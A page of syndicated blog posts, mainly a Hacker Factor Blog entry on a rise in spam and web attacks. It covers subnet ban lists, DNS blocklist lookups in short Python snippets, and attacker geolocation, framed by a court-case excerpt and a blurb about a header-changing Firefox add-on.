Additionally, clues that could’ve led somewhere were overlooked, the defense lawyer argued. For instance, an IP address found in CSC’s logs was traced back to a famous Swedish hacker known as ‘MG’.

“The investigation was not objective. I do not understand why it’s not possible to investigate clues that don’t take much effort to be investigated,” Høj said. “The willingness to investigate clues that do not speak in favor of the police case has been minimal.”

A decision in the case is expected at the end of the month. If found guilty, Gottfrid faces up to four years in jail.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

The Hacker Factor Blog: Bellwether

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

For the last few months, I have been seeing a huge up-tick on two kinds of traffic: spam and network attacks. Over the last few weeks, I have realized that they are directly related.

“I don’t want any SPAM!” — Monty Python

I used to take pride in my ability to stay off spam mailing lists. For over 12 years, I have averaged 4-8 spam messages per day without using any kind of mail filters. That all changed earlier this year, when I suddenly began getting about 50 undesirable emails per day. That’s when I first enabled the commonly used mail filter called spamassassin.

Although spamassassin reduced the flood by 50%, some spam still got through. Meanwhile the amount of spam dramatically increased from 50 messages per day to 500 or more per day. I tweaked a couple of the spamassassin rules and added in some procmail rules at the final mailbox. Now I’m down to a few hundred per day getting past spamassassin and about 10 per day that make it past my procmail rules.

The good news is that I am very confident that I am not losing any legitimate emails. The bad news is that spammers seem to be seriously upping the volume since at least March of this year.

Each time I register with a new online service, I try to use a different email address. This way, if any service I use has their list acquired by spammers, then I know which server caused the problem. Unfortunately, most of these messages are not going to my service-specific addresses. Instead, they are going to one of my three primary accounts that I give out to people. I suspect that someone I know got infected and had their address list stolen.

These high-volume spam messages are coming from specific subnets. It appears that 2-3 spam groups are purchasing subnets from small hosting providers and then spamming like crazy until they get shut down. Moreover, the hosting providers appear to be ignoring complaints and permitting the abuse. So far, I have banned all emails from 191.101.xx.xx, 192.3.xx.xx, 103.252.xx.xx, 204.15.135.xx, and 209.95.38.xx. These account for over 800 emails to me over the last month.
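A ban list like that is easy to enforce with the standard ipaddress module. The masks below are inferred from the xx.xx notation above (/16 where two octets are wildcarded, /24 where one is) and are an assumption, not the author's actual rules:

```python
import ipaddress

# Subnets listed above; /16 and /24 masks inferred from the xx.xx notation.
BANNED = [ipaddress.ip_network(net) for net in (
    "191.101.0.0/16", "192.3.0.0/16", "103.252.0.0/16",
    "204.15.135.0/24", "209.95.38.0/24",
)]

def is_banned(addr):
    """True if the address falls inside any banned range."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in BANNED)
```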

I’m not the only person seeing this large increase in spam. There have been similar reports at forums like Symantec and Ars Technica. According to Cisco, spam has increased more than 3x since 2013.

“Oh, what a tangled web we weave when first we practise to deceive!” — Walter Scott

Coinciding with the increase in spam is an increase in web attacks. I have seen nearly a 3x increase in web-based scans and attacks in the last year. Because of this, I have added additional filters to identify these attacks and block the offending addresses.

Using data collected at FotoForensics, I began to look up the banned IP addresses using over 30 different dnsbl sites. About 40% of the time, the address is already associated with suspicious web activity (e.g., port scanning and attacks) and 70% of the time they are already associated with spam.
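A DNSBL lookup works by reversing the IPv4 octets, appending the blocklist zone, and resolving the name; a successful answer means "listed". The post doesn't name the 30+ lists used, so zen.spamhaus.org below is just one well-known example:

```python
import socket

def dnsbl_query(addr, zone="zen.spamhaus.org"):
    """Build the DNSBL query name: reversed octets plus the list's zone."""
    return ".".join(reversed(addr.split("."))) + "." + zone

def dnsbl_listed(addr, zone="zen.spamhaus.org"):
    """A successful A-record lookup means the address is listed."""
    try:
        socket.gethostbyname(dnsbl_query(addr, zone))
        return True
    except socket.gaierror:
        return False
```

Repeating the check against each of the 30-odd zones gives the per-address hit rates described above.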

I have graphed out the attackers over the last 75 days. The size of the dot represents the percent of traffic. Red denotes cities and yellow denotes countries (when the city is unknown). Mousing-over the picture shows the per-country distribution.

Since I am blocking access immediately, there is only one attack recorded per IP address. If a city or country has multiple sightings, then those are multiple addresses that geolocated to the same city/country.

Although the United States generates the largest number of network attacks, they really come from cities all over the place. There is no central city. The eight cities that generate the most attacks are Hanoi (Vietnam), Fuzhou (China), Guangzhou (China), Bangkok (Thailand), Nanjing (China), Taipei (Taiwan), Istanbul (Turkey), and Chongqing (China).

The top 10 countries that have attacked my sites are: USA (with 70 sightings), China (62), Germany (42), Ukraine, Thailand, Vietnam, South Korea, India, Taiwan, and Turkey.

Most of these attacks appear to come from subnets. For example, Hetzner Online AG (AS24940) has two subnets that are explicitly used for network attacks: – and – Every IP address in these ranges has explicitly conducted a web-based attack against my server.

By detecting these attacks and blocking access immediately, I’ve seen one other side-effect: a huge (20%) drop in volume from other network addresses. The attacks that I am blocking appear to be bellwethers; if these attacks are not blocked then others will follow. Blocking the bellwether stops the subsequent scans and attacks from other network addresses. This theory was easy enough to test: rather than banning, I just recorded a few of the network attacks and allowed them to continue. This resulted in an increase in attacks from other countries and subnets. Blocking the attacks caused a direct drop in hostile traffic from all over the place.

“Coincidence is God’s way of remaining anonymous.” — Albert Einstein

While I was collecting information on attackers, I tested a few other types of online tracking. For example, it is easy enough for my server to identify if the recipient is using an anonymizing network. I wanted to see if attacks correlated with these systems. Amazingly, the distribution of attacks from anonymous proxies is not significantly different from non-proxy addresses. I could find no correlation.

Here are the locations of detected anonymizers that accessed my site. This also includes botnets that distribute links to scan across network addresses. Again, each IP address is only counted once:

When it comes to anonymity, we’re mapping the anonymous exit address to a location. With TOR users, you may be physically in France but using an address in Australia. We would count it as Australia and not France. Amazingly, there are not many TOR nodes in this graph. (Probably because many TOR nodes have been banned for being involved in network attacks.)

In these maps, you’ll also notice a yellow dot in the water off the west coast of Africa. That’s latitude,longitude “0,0” and denotes addresses that cannot be mapped back to countries. These are completely anonymous servers and satellite providers. (But keep in mind: just because your server cannot be geolocated, it does not mean that you are truly anonymous.)

The big dots in California are from Google and Microsoft. Their bots appear because they constantly change addresses (like TOR users). The big dot in Japan is Trend Micro. However, the single biggest group of anonymity users are in Saudi Arabia. They change addresses and anonymize HTTP headers like crazy! Asia is also really big on anonymizing systems. I assume that this is because their users are either trying to bypass government filters or are unaware that their traffic is being hijacked by government filters. In contrast, Germany and Poland appear big due to the sheer number of TOR nodes.

Finally, I tried to correlate the use of network attacks or anonymity systems to people who upload prohibited content to FotoForensics.

There is really no correlation at all. The more conservative areas, like Saudi Arabia, most of the Middle East, and Asia, rarely upload pornography, nudity, or sexually explicit content. In contrast, the United States and Europe really like their porn. (Germany is mostly due to the >_ forum that I previously mentioned. Even when shown a warning that they are about to be banned, nearly 80% of the time they consciously choose to continue and get banned. Idiots.)

“It is madness for sheep to talk peace with a wolf.” — Thomas Fuller

By actively blocking the initial bellwether network scans, I have seen that it dramatically reduces the number of follow-up attacks. Overall, I see a significant drop in scans, harvesters, and even comment spammers. Since these addresses are associated with unsolicited email, immediately stopping them from accessing the web server should result in an immediate drop in the volume of spam.

I have since deployed my blocking technology on a second site. In the last four days, it blocked over 300 network addresses that were scanning for vulnerabilities, uploading comment spam, and searching for network addresses.

However, FotoForensics and are very small web sites compared to most other online services. Any impact from my own blocking is likely to be insignificant across the whole world. However, it does demonstrate one finding related to spam: there is a direct correlation between web-based scans and attacks, and systems that generate spam emails. If big companies temporarily block access when a hostile scan is detected, then the overall volume of spam across the world should be rapidly reduced.

Darknet - The Darkside: IPFlood – Simple Firefox Add-on To Hide Your IP Address

This post was syndicated from: Darknet - The Darkside and was written by: Darknet. Original post: at Darknet - The Darkside

IPFlood (previously IPFuck) is a Firefox add-on created to simulate the use of a proxy. It doesn’t actually change your IP address (obviously) and it doesn’t connect to a proxy either, it just changes the headers (that it can) so it appears to any web servers or software sniffing – that you are in fact […]

The post IPFlood…

Read the full post at